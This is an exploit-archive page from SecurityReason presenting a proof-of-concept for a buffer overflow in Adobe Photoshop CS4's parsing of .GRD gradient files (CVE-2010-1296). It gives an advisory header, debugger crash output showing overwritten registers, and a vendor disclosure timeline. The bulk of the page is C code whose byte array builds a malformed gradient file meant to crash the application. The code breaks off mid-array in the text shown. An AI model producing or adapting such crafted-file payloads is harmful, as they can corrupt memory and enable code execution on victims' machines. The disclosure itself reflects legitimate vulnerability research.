SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow ExploitAlert Database

Arrow  Topic :

Adobe Photoshop CS4 Extended 11.0 GRD File Handling Remote Buffer Overflow PoC


Arrow  ExploitAlert : 8292
Arrow  Credit : LiquidWorm
Arrow  Date : 27.05.2010

Arrow   Download

Arrow   Plain text version


Arrow  Exploit Code :  

/*

Title:
Adobe Photoshop CS4 Extended 11.0 GRD File Handling Remote Buffer Overflow
PoC


Summary: The Adobe® Photoshop® family of products is the
ultimate playground for
bringing out the best in your digital images, transforming them into
anything you
can imagine and showcasing them in extraordinary ways.

Description: Adobe Photoshop CS4 Extended suffers from a buffer overflow
vulnerability
when dealing with .GRD (gradients) format file. The application failz to
sanitize the
user input resulting in a memory corruption, overwriting several memory
registers which
can aid the atacker to gain the power of executing arbitrary code or
denial of service.

Vendor:
Adobe Systems Incorporated

Product Web Page:
http://www.adobe.com/

Current Version:
CS4 Extended 11.0.0.0

Tested On:
Microsoft Windwos XP Professional SP3 (English)


--------------------------------------------------------------------------
-

(718.cd4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7efefefe ebx=00414141 ecx=000dbb7f edx=41414141 esi=12fb5368
edi=0b050000
eip=781807f5 esp=0012de64 ebp=05620e10 iopl=0 nv up ei pl zr na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010246
MSVCR80!strncpy+0xa5:
781807f5 8917 mov dword ptr [edi],edx
ds:0023:0b050000=????????
0:000> g
(718.af8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=ffffffff ebx=00252178 ecx=41414141 edx=781c3bf8 esi=0afd2420
edi=7c80980a
eip=7c809813 esp=12b8fe04 ebp=12b8fe4c iopl=0 nv up ei pl nz na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010206
kernel32!InterlockedDecrement+0x9:
7c809813 f00fc101 lock xadd dword ptr [ecx],eax
ds:0023:41414141=????????

--------------------------------------------------------------------------
-


Vendor Status:
[08.08.2009] Vendor notified.
[10.08.2009] Vendor replied.
[14.08.2009] Asked vendor for confirmation.
[14.08.2009] Vendor confirms vulnerability.
[18.05.2010] Vendor reveals patch release date.
[26.05.2010] Coordinated public disclosure.


Zero Science Lab Advisory ID: ZSL-2010-4939
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4939.php
Adobe Advisory ID: APSB10-13
Advisory: http://www.adobe.com/support/security/bulletins/apsb10-13.html
CVE ID: CVE-2010-1296


Vulnerability Discovered By:

Gjoko 'LiquidWorm' Krstic

liquidworm gmail com

Zero Science Lab - http://www.zeroscience.mk

08.08.2009


*/



#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>

#define NAMEFILE "Awesome_Gradients.grd"

FILE *pf;

char gradih[] = {
0x38, 0x42, 0x47, 0x52, 0x00, 0x05, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x6E, 0x75, 0x6C, 0x6C, 0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00,
0x47, 0x72, 0x64, 0x4C, 0x56, 0x6C, 0x4C, 0x73, 0x00, 0x00, 0x00, 0x0B,
0x4F, 0x62, 0x6A, 0x63,
0x00, 0x00, 0x00, 0x09, 0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00, 0x64,
0x00, 0x69, 0x00, 0x65,
0x00, 0x6E, 0x00, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72,
0x64, 0x6E, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x61, 0x64, 0x4F, 0x62,
0x6A, 0x63, 0x00, 0x00,
0x00, 0x09, 0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00, 0x64, 0x00, 0x69,
0x00, 0x65, 0x00, 0x6E,
0x00, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x6E,
0x00, 0x00, 0x00, 0x09,
0x00, 0x00, 0x00, 0x00, 0x4E, 0x6D, 0x20, 0x20, 0x54, 0x45, 0x58, 0x54,
0x00, 0x00, 0x00, 0x33,
0x00, 0x24, 0x00, 0x24, 0x00, 0x24, 0x00, 0x2F, 0x00, 0x50, 0x00, 0x72,
0x00, 0x65, 0x00, 0x73,
0x00, 0x65, 0x00, 0x74, 0x00, 0x73, 0x00, 0x2F, 0x00, 0x47, 0x00, 0x72,
0x00, 0x61, 0x00, 0x64,
0x00, 0x69, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x73, 0x00, 0x2F,
0x00, 0x4E, 0x00, 0x6F,
0x00, 0x69, 0x00, 0x73, 0x00, 0x65, 0x00, 0x53, 0x00, 0x61, 0x00, 0x6D,
0x00, 0x70, 0x00, 0x6C,
0x00, 0x65, 0x00, 0x73, 0x00, 0x5F, 0x00, 0x67, 0x00, 0x72, 0x00, 0x64,
0x00, 0x2F, 0x00, 0x42,
0x00, 0x6C, 0x00, 0x75, 0x00, 0x65, 0x00, 0x73, 0x00, 0x3D, 0x00, 0x42,
0x00, 0x6C, 0x00, 0x75,
0x00, 0x65, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72,
0x64, 0x46, 0x65, 0x6E,
0x75, 0x6D, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x46, 0x00, 0x00,
0x00, 0x00, 0x43, 0x6C,
0x4E, 0x73, 0x00, 0x00, 0x00, 0x00, 0x53, 0x68, 0x54, 0x72, 0x62, 0x6F,
0x6F, 0x6C, 0x00, 0x00,
0x00, 0x00, 0x00, 0x56, 0x63, 0x74, 0x43, 0x62, 0x6F, 0x6F, 0x6C, 0x01,
0x00, 0x00, 0x00, 0x00,
0x43, 0x6C, 0x72, 0x53, 0x65, 0x6E, 0x75, 0x6D, 0x00, 0x00, 0x00, 0x00,
0x43, 0x6C, 0x72, 0x53,
0x00, 0x00, 0x00, 0x00, 0x52, 0x47, 0x42, 0x43, 0x00, 0x00, 0x00, 0x00,
0x52, 0x6E, 0x64, 0x53,
0x6C, 0x6F, 0x6E, 0x67, 0x79, 0x06, 0x56, 0xA6, 0x00, 0x00, 0x00, 0x00,
0x53, 0x6D, 0x74, 0x68,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00,
0x4D, 0x6E, 0x6D, 0x20,
0x56, 0x6C, 0x4C, 0x73, 0x00, 0x00, 0x00, 0x04, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x00,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x00,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x4D, 0x78, 0x6D, 0x20,
0x56, 0x6C, 0x4C, 0x73, 0x00, 0x00, 0x00, 0x04, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x64,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x64,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x4F, 0x62, 0x6A, 0x63,
0x00, 0x00, 0x00, 0x09,
0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00, 0x64, 0x00, 0x69, 0x00, 0x65,
0x00, 0x6E, 0x00, 0x74,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x6E, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00,
0x00, 0x00, 0x47, 0x72, 0x61, 0x64, 0x4F, 0x62, 0x6A, 0x63, 0x00, 0x00,
0x00, 0x09, 0x00, 0x47,
0x00, 0x72, 0x00, 0x61, 0x00, 0x64, 0x00, 0x69, 0x00, 0x65, 0x00, 0x6E,
0x00, 0x74, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x6E, 0x00, 0x00, 0x00, 0x09,
0x00, 0x00, 0x00, 0x00,
0x4E, 0x6D, 0x20, 0x20, 0x54, 0x45, 0x58, 0x54, 0x00, 0x00, 0x00, 0x35,
0x00, 0x24, 0x00, 0x24,
0x00, 0x24, 0x00, 0x2F, 0x00, 0x50, 0x00, 0x72, 0x00, 0x65, 0x00, 0x73,
0x00, 0x65, 0x00, 0x74,
0x00, 0x73, 0x00, 0x2F, 0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00, 0x64,
0x00, 0x69, 0x00, 0x65,
0x00, 0x6E, 0x00, 0x74, 0x00, 0x73, 0x00, 0x2F, 0x00, 0x4E, 0x00, 0x6F,
0x00, 0x69, 0x00, 0x73,
0x00, 0x65, 0x00, 0x53, 0x00, 0x61, 0x00, 0x6D, 0x00, 0x70, 0x00, 0x6C,
0x00, 0x65, 0x00, 0x73,
0x00, 0x5F, 0x00, 0x67, 0x00, 0x72, 0x00, 0x64, 0x00, 0x2F, 0x00, 0x47,
0x00, 0x72, 0x00, 0x65,
0x00, 0x65, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x3D, 0x00, 0x47, 0x00, 0x72,
0x00, 0x65, 0x00, 0x65,
0x00, 0x6E, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72,
0x64, 0x46, 0x65, 0x6E,
0x75, 0x6D, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x46, 0x00, 0x00,
0x00, 0x00, 0x43, 0x6C,
0x4E, 0x73, 0x00, 0x00, 0x00, 0x00, 0x53, 0x68, 0x54, 0x72, 0x62, 0x6F,
0x6F, 0x6C, 0x00, 0x00,
0x00, 0x00, 0x00, 0x56, 0x63, 0x74, 0x43, 0x62, 0x6F, 0x6F, 0x6C, 0x01,
0x00, 0x00, 0x00, 0x00,
0x43, 0x6C, 0x72, 0x53, 0x65, 0x6E, 0x75, 0x6D, 0x00, 0x00, 0x00, 0x00,
0x43, 0x6C, 0x72, 0x53,
0x00, 0x00, 0x00, 0x00, 0x52, 0x47, 0x42, 0x43, 0x00, 0x00, 0x00, 0x00,
0x52, 0x6E, 0x64, 0x53,
0x6C, 0x6F, 0x6E, 0x67, 0x68, 0x5C, 0x5E, 0xD8, 0x00, 0x00, 0x00, 0x00,
0x53, 0x6D, 0x74, 0x68,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00,
0x4D, 0x6E, 0x6D, 0x20,
0x56, 0x6C, 0x4C, 0x73, 0x00, 0x00, 0x00, 0x04, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x00,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x00,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x4D, 0x78, 0x6D, 0x20,
0x56, 0x6C, 0x4C, 0x73, 0x00, 0x00, 0x00, 0x04, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x64,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x64,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x4F, 0x62, 0x6A, 0x63,
0x00, 0x00, 0x00, 0x09,
0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00, 0x64, 0x00, 0x69, 0x00, 0x65,
0x00, 0x6E, 0x00, 0x74,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x6E, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00,
0x00, 0x00, 0x47, 0x72, 0x61, 0x64, 0x4F, 0x62, 0x6A, 0x63, 0x00, 0x00,
0x00, 0x09, 0x00, 0x47,
0x00, 0x72, 0x00, 0x61, 0x00, 0x64, 0x00, 0x69, 0x00, 0x65, 0x00, 0x6E,
0x00, 0x74, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x6E, 0x00, 0x00, 0x00, 0x09,
0x00, 0x00, 0x00, 0x00,
0x4E, 0x6D, 0x20, 0x20, 0x54, 0x45, 0x58, 0x54, 0x00, 0x00, 0x00, 0x37,
0x00, 0x24, 0x00, 0x24,
0x00, 0x24, 0x00, 0x2F, 0x00, 0x50, 0x00, 0x72, 0x00, 0x65, 0x00, 0x73,
0x00, 0x65, 0x00, 0x74,
0x00, 0x73, 0x00, 0x2F, 0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00, 0x64,
0x00, 0x69, 0x00, 0x65,
0x00, 0x6E, 0x00, 0x74, 0x00, 0x73, 0x00, 0x2F, 0x00, 0x4E, 0x00, 0x6F,
0x00, 0x69, 0x00, 0x73,
0x00, 0x65, 0x00, 0x53, 0x00, 0x61, 0x00, 0x6D, 0x00, 0x70, 0x00, 0x6C,
0x00, 0x65, 0x00, 0x73,
0x00, 0x5F, 0x00, 0x67, 0x00, 0x72, 0x00, 0x64, 0x00, 0x2F, 0x00, 0x53,
0x00, 0x75, 0x00, 0x6E,
0x00, 0x72, 0x00, 0x69, 0x00, 0x73, 0x00, 0x65, 0x00, 0x3D, 0x00, 0x53,
0x00, 0x75, 0x00, 0x6E,
0x00, 0x72, 0x00, 0x69, 0x00, 0x73, 0x00, 0x65, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x47, 0x72,
0x64, 0x46, 0x65, 0x6E, 0x75, 0x6D, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72,
0x64, 0x46, 0x00, 0x00,
0x00, 0x00, 0x43, 0x6C, 0x4E, 0x73, 0x00, 0x00, 0x00, 0x00, 0x53, 0x68,
0x54, 0x72, 0x62, 0x6F,
0x6F, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x56, 0x63, 0x74, 0x43, 0x62,
0x6F, 0x6F, 0x6C, 0x01,
0x00, 0x00, 0x00, 0x00, 0x43, 0x6C, 0x72, 0x53, 0x65, 0x6E, 0x75, 0x6D,
0x00, 0x00, 0x00, 0x00,
0x43, 0x6C, 0x72, 0x53, 0x00, 0x00, 0x00, 0x00, 0x52, 0x47, 0x42, 0x43,
0x00, 0x00, 0x00, 0x00,
0x52, 0x6E, 0x64, 0x53, 0x6C, 0x6F, 0x6E, 0x67, 0x23, 0xBB, 0x09, 0x4C,
0x00, 0x00, 0x00, 0x00,
0x53, 0x6D, 0x74, 0x68, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x08, 0x00,
0x00, 0x00, 0x00, 0x00,
0x4D, 0x6E, 0x6D, 0x20, 0x56, 0x6C, 0x4C, 0x73, 0x00, 0x00, 0x00, 0x04,
0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00,
0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x4D, 0x78, 0x6D, 0x20, 0x56, 0x6C, 0x4C, 0x73, 0x00, 0x00, 0x00, 0x04,
0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64,
0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64,
0x4F, 0x62, 0x6A, 0x63,
0x00, 0x00, 0x00, 0x09, 0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00, 0x64,
0x00, 0x69, 0x00, 0x65,
0x00, 0x6E, 0x00, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72,
0x64, 0x6E, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x61, 0x64, 0x4F, 0x62,
0x6A, 0x63, 0x00, 0x00,
0x00, 0x09, 0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00, 0x64, 0x00, 0x69,
0x00, 0x65, 0x00, 0x6E,
0x00, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x6E,
0x00, 0x00, 0x00, 0x09,
0x00, 0x00, 0x00, 0x00, 0x4E, 0x6D, 0x20, 0x20, 0x54, 0x45, 0x58, 0x54,
0x00, 0x00, 0x00, 0x42,
0x00, 0x24, 0x00, 0x24, 0x00, 0x24, 0x00, 0x2F, 0x00, 0x50, 0x00, 0x72,
0x00, 0x65, 0x00, 0x73,
0x00, 0x65, 0x00, 0x74, 0x00, 0x73, 0x00, 0x2F, 0x00, 0x47, 0x00, 0x72,
0x00, 0x61, 0x00, 0x64,
0x00, 0x69, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x73, 0x00, 0x2F,
0x00, 0x4E, 0x00, 0x6F,
0x00, 0x69, 0x00, 0x73, 0x00, 0x65, 0x00, 0x53, 0x00, 0x61, 0x00, 0x6D,
0x00, 0x70, 0x00, 0x6C,
0x00, 0x65, 0x00, 0x73, 0x00, 0x5F, 0x00, 0x67, 0x00, 0x72, 0x00, 0x64,
0x00, 0x2F, 0x00, 0x50,
0x00, 0x61, 0x00, 0x73, 0x00, 0x74, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x47,
0x00, 0x72, 0x00, 0x65,
0x00, 0x65, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x3D, 0x00, 0x50, 0x00, 0x61,
0x00, 0x73, 0x00, 0x74,
0x00, 0x65, 0x00, 0x6C, 0x00, 0x20, 0x00, 0x47, 0x00, 0x72, 0x00, 0x65,
0x00, 0x65, 0x00, 0x6E,
0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x46,
0x65, 0x6E, 0x75, 0x6D,
0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x46, 0x00, 0x00, 0x00, 0x00,
0x43, 0x6C, 0x4E, 0x73,
0x00, 0x00, 0x00, 0x00, 0x53, 0x68, 0x54, 0x72, 0x62, 0x6F, 0x6F, 0x6C,
0x00, 0x00, 0x00, 0x00,
0x00, 0x56, 0x63, 0x74, 0x43, 0x62, 0x6F, 0x6F, 0x6C, 0x01, 0x00, 0x00,
0x00, 0x00, 0x43, 0x6C,
0x72, 0x53, 0x65, 0x6E, 0x75, 0x6D, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6C,
0x72, 0x53, 0x00, 0x00,
0x00, 0x00, 0x52, 0x47, 0x42, 0x43, 0x00, 0x00, 0x00, 0x00, 0x52, 0x6E,
0x64, 0x53, 0x6C, 0x6F,
0x6E, 0x67, 0x2C, 0xDE, 0xAD, 0xEE, 0x00, 0x00, 0x00, 0x00, 0x53, 0x6D,
0x74, 0x68, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00, 0x01, 0xEC, 0x00, 0x00, 0x00, 0x00, 0x4D, 0x6E,
0x6D, 0x20, 0x56, 0x6C,
0x4C, 0x73, 0x00, 0x00, 0x00, 0x04, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00,
0x00, 0x00, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00,
0x00, 0x00, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4D, 0x78,
0x6D, 0x20, 0x56, 0x6C,
0x4C, 0x73, 0x00, 0x00, 0x00, 0x04, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00,
0x00, 0x64, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00,
0x00, 0x64, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x4F, 0x62, 0x6A, 0x63, 0x00, 0x00,
0x00, 0x09, 0x00, 0x47,
0x00, 0x72, 0x00, 0x61, 0x00, 0x64, 0x00, 0x69, 0x00, 0x65, 0x00, 0x6E,
0x00, 0x74, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x6E, 0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00,
0x47, 0x72, 0x61, 0x64, 0x4F, 0x62, 0x6A, 0x63, 0x00, 0x00, 0x00, 0x09,
0x00, 0x47, 0x00, 0x72,
0x00, 0x61, 0x00, 0x64, 0x00, 0x69, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x47, 0x72, 0x64, 0x6E, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00,
0x00, 0x00, 0x4E, 0x6D,
0x20, 0x20, 0x54, 0x45, 0x58, 0x54, 0x00, 0x00, 0x00, 0x37, 0x00, 0x24,
0x00, 0x24, 0x00, 0x24,
0x00, 0x2F, 0x00, 0x50, 0x00, 0x72, 0x00, 0x65, 0x00, 0x73, 0x00, 0x65,
0x00, 0x74, 0x00, 0x73,
0x00, 0x2F, 0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00, 0x64, 0x00, 0x69,
0x00, 0x65, 0x00, 0x6E,
0x00, 0x74, 0x00, 0x73, 0x00, 0x2F, 0x00, 0x4E, 0x00, 0x6F, 0x00, 0x69,
0x00, 0x73, 0x00, 0x65,
0x00, 0x53, 0x00, 0x61, 0x00, 0x6D, 0x00, 0x70, 0x00, 0x6C, 0x00, 0x65,
0x00, 0x73, 0x00, 0x5F,
0x00, 0x67, 0x00, 0x72, 0x00, 0x64, 0x00, 0x2F, 0x00, 0x50, 0x00, 0x75,
0x00, 0x72, 0x00, 0x70,
0x00, 0x6C, 0x00, 0x65, 0x00, 0x73, 0x00, 0x3D, 0x00, 0x50, 0x00, 0x75,
0x00, 0x72, 0x00, 0x70,
0x00, 0x6C, 0x00, 0x65, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x47, 0x72, 0x64, 0x46,
0x65, 0x6E, 0x75, 0x6D, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x46,
0x00, 0x00, 0x00, 0x00,
0x43, 0x6C, 0x4E, 0x73, 0x00, 0x00, 0x00, 0x00, 0x53, 0x68, 0x54, 0x72,
0x62, 0x6F, 0x6F, 0x6C,
0x00, 0x00, 0x00, 0x00, 0x00, 0x56, 0x63, 0x74, 0x43, 0x62, 0x6F, 0x6F,
0x6C, 0x00, 0x00, 0x00,
0x00, 0x00, 0x43, 0x6C, 0x72, 0x53, 0x65, 0x6E, 0x75, 0x6D, 0x00, 0x00,
0x00, 0x00, 0x43, 0x6C,
0x72, 0x53, 0x00, 0x00, 0x00, 0x00, 0x52, 0x47, 0x42, 0x43, 0x00, 0x00,
0x00, 0x00, 0x52, 0x6E,
0x64, 0x53, 0x6C, 0x6F, 0x6E, 0x67, 0x74, 0xC9, 0x27, 0xD5, 0x00, 0x00,
0x00, 0x00, 0x53, 0x6D,
0x74, 0x68, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x06, 0x66, 0x00, 0x00,
0x00, 0x00, 0x4D, 0x6E,
0x6D, 0x20, 0x56, 0x6C, 0x4C, 0x73, 0x00, 0x00, 0x00, 0x04, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00,
0x00, 0x00, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00,
0x00, 0x00, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x4D, 0x78,
0x6D, 0x20, 0x56, 0x6C, 0x4C, 0x73, 0x00, 0x00, 0x00, 0x04, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00,
0x00, 0x64, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F,
0x6E, 0x67, 0x00, 0x00,
0x00, 0x64, 0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x4F, 0x62,
0x6A, 0x63, 0x00, 0x00,
0x00, 0x09, 0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00, 0x64, 0x00, 0x69,
0x00, 0x65, 0x00, 0x6E,
0x00, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x6E,
0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x61, 0x64, 0x4F, 0x62, 0x6A, 0x63,
0x00, 0x00, 0x00, 0x09,
0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00, 0x64, 0x00, 0x69, 0x00, 0x65,
0x00, 0x6E, 0x00, 0x74,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x72, 0x64, 0x6E, 0x00, 0x00,
0x00, 0x09, 0x00, 0x00,
0x00, 0x00, 0x4E, 0x6D, 0x20, 0x20, 0x54, 0x45, 0x58, 0x54, 0x00, 0x00,
0x00, 0x38, 0x00, 0x24,
0x00, 0x24, 0x00, 0x24, 0x00, 0x2F, 0x00, 0x50, 0x00, 0x72, 0x00, 0x65,
0x00, 0x73, 0x00, 0x65,
0x00, 0x74, 0x00, 0x73, 0x00, 0x2F, 0x00, 0x47, 0x00, 0x72, 0x00, 0x61,
0x00, 0x64, 0x00, 0x69,
0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x73, 0x00, 0x2F, 0x00, 0x4E,
0x00, 0x6F, 0x00, 0x69,
0x00, 0x73, 0x00, 0x65, 0x00, 0x53, 0x00, 0x61, 0x00, 0x6D, 0x00, 0x70,
0x00, 0x6C, 0x00, 0x65,
0x00, 0x73, 0x00, 0x5F, 0x00, 0x67, 0x00, 0x72, 0x00, 0x64, 0x00, 0x2F,
0x00, 0x44, 0x00, 0x65,
0x00, 0x65, 0x00, 0x70, 0x00, 0x53, 0x00, 0x65, 0x00, 0x61, 0x00, 0x3D,
0x00, 0x44, 0x00, 0x65,
0x00, 0x65, 0x00, 0x70, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x61,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x47, 0x72, 0x64, 0x46, 0x65, 0x6E, 0x75, 0x6D, 0x00, 0x00,
0x00, 0x00, 0x47, 0x72,
0x64, 0x46, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6C, 0x4E, 0x73, 0x00, 0x00,
0x00, 0x00, 0x53, 0x68,
0x54, 0x72, 0x62, 0x6F, 0x6F, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x56,
0x63, 0x74, 0x43, 0x62,
0x6F, 0x6F, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6C, 0x72, 0x53,
0x65, 0x6E, 0x75, 0x6D,
0x00, 0x00, 0x00, 0x00, 0x43, 0x6C, 0x72, 0x53, 0x00, 0x00, 0x00, 0x00,
0x52, 0x47, 0x42, 0x43,
0x00, 0x00, 0x00, 0x00, 0x52, 0x6E, 0x64, 0x53, 0x6C, 0x6F, 0x6E, 0x67,
0x4D, 0x08, 0x3A, 0xBF,
0x00, 0x00, 0x00, 0x00, 0x53, 0x6D, 0x74, 0x68, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x06, 0x66,
0x00, 0x00, 0x00, 0x00, 0x4D, 0x6E, 0x6D, 0x20, 0x56, 0x6C, 0x4C, 0x73,
0x00, 0x00, 0x00, 0x04,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x00,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x00, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x4D, 0x78, 0x6D, 0x20, 0x56, 0x6C, 0x4C, 0x73,
0x00, 0x00, 0x00, 0x04,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x64,
0x6C, 0x6F, 0x6E, 0x67, 0x00, 0x00, 0x00, 0x64, 0x6C, 0x6F, 0x6E, 0x67,
0x00, 0x00, 0x00, 0x64,
